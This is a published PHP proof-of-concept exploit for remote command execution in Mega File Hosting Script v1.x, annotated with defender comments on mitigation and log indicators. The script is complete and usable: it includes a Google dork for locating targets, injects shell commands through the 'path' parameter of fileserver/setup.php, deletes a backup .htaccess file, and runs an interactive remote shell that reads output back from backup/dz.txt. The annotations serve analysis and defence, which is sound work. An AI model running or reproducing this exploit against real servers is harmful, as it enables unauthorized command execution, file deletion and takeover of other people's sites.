
Mega File Hosting Script v1.x Remote Command Execution

Author: DzKabyle , Published: 27-02-2014
<?
/*
-------------------------------------------------------------------
Mega File Hosting Script v1.x Remote Command Execution
-------------------------------------------------------------------

########################################################################
# Author = DzKabyle #
# E-mail = k4byl3@gmail.com #
# Google Dork = intext:" Powered by: MFH v1.x | CSS | XHTML " #
# Vendor : https://yabsoft.com/ #
# Tested on : Windows 7 #
# Thx TO : UzunDz & jasass #
########################################################################

*/


// Defender's reading of this proof-of-concept: every command is delivered as the
// `path` query parameter of fileserver/setup.php with act=checkmodule, wrapped in
// "+ ... +;+" ('+' decodes to a space, ';' is a shell command separator). That the
// endpoint hands the value to a shell is inferred from this script; the vendor
// code is not shown here.
// Mitigation on an affected install: remove or access-restrict setup.php
// (presumably an installer left reachable after setup; confirm), and have the
// server-side code quote the value with escapeshellarg() or avoid the shell.

// Silence PHP diagnostics, lift the execution time limit, cap socket waits at 5 s.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

print "\n+--------------------------------------------------------------------+";
print "\n| Mega File Hosting Script v1.x Remote Command Execution By DzKabyle |";
print "\n+--------------------------------------------------------------------+\n";
// Usage banner; the script stops here when $argc is below 2.
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path/ \n";
print "\nExample....: php $argv[0] http://localhost/ mfh/ \n";
die();
}

$host = $argv[1];
$path = $argv[2];

// serverroot.php is fetched over HTTP without credentials and its response body is
// used as a filesystem prefix in every command below. Presumably the application
// prints its absolute install path there (confirm against the vendor code); an
// unauthenticated path disclosure like that is worth closing on its own.
$path1 = file_get_contents($host."/".$path."/serverroot.php");
// Request 1 asks the server to delete backup/.htaccess under that prefix.
// Presumably that file blocks direct web access to backup/; its unexpected
// disappearance is a strong compromise indicator to alert on.
$payload=$host."/". $path."/fileserver/setup.php?act=checkmodule&path=+rm+".$path1."/backup/.htaccess+;+&path2=&path3=&check=ReCheck";
rce($payload);
// Request 2 runs `id` and redirects its output into backup/dz.txt, which is then
// read back over plain HTTP. A dz.txt inside backup/ is a file-system indicator
// for this specific script (the file name is trivially changed, so treat any
// unexpected file in backup/ as suspect).
$payload2=$host."/".$path."/fileserver/setup.php?act=checkmodule&path=+id+>+".$path1."/backup/dz.txt+;+&path2=&path3=&check=ReCheck";
rce($payload2);
echo file_get_contents($host."/".$path."/backup/dz.txt");
// Interactive loop: each line read from STDIN is sent through the same parameter
// and its output is fetched from the same dz.txt. In request logs this appears as
// repeated setup.php hits with act=checkmodule, each followed by a fetch of
// /backup/dz.txt from the same client.
while(1)
{
print "\nMFH-Shell# ";
// Typing "exit" ends the session; nothing is cleaned up on the server side.
if (($cmd = trim(fgets(STDIN))) == "exit") break;

// Spaces become '+' so the command survives as a query-string value.
$cmd = str_ireplace(' ','+',$cmd);
$payload2=$host."/".$path."/fileserver/setup.php?act=checkmodule&path=+".$cmd."+>+".$path1."/backup/dz.txt+;+&path2=&path3=&check=ReCheck";
rce($payload2);
echo file_get_contents($host."/".$path."/backup/dz.txt");

}

/**
 * Sends one HTTP request to $url with cURL and discards the response.
 *
 * The injected command travels entirely in the URL's query string, so it is
 * recorded wherever the request URI is logged (web server access log, proxy or
 * WAF log). No cookie, credential or token is attached, i.e. the script treats
 * the target endpoint as reachable without authentication.
 *
 * @param string $url Full request URL, query string included.
 * @return void The response is stored in a local variable and never returned.
 */
function rce($url){

$dzkabyle = curl_init();
curl_setopt($dzkabyle, CURLOPT_URL,$url);
// Fixed Firefox 18 / Windows NT 5.1 User-Agent: usable as a weak log indicator
// only, since it is a one-line change.
curl_setopt($dzkabyle,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
curl_setopt($dzkabyle, CURLOPT_POST, 0);
// NOTE(review): $post is not defined in this scope, so no body data is supplied.
curl_setopt($dzkabyle, CURLOPT_POSTFIELDS,$post);
// Capture the response instead of printing it; the caller reads command output
// from backup/dz.txt rather than from this response.
curl_setopt($dzkabyle,CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($dzkabyle);


}

//Exploited By dzkabyle www.exploit4arab.net sec4ever
?>
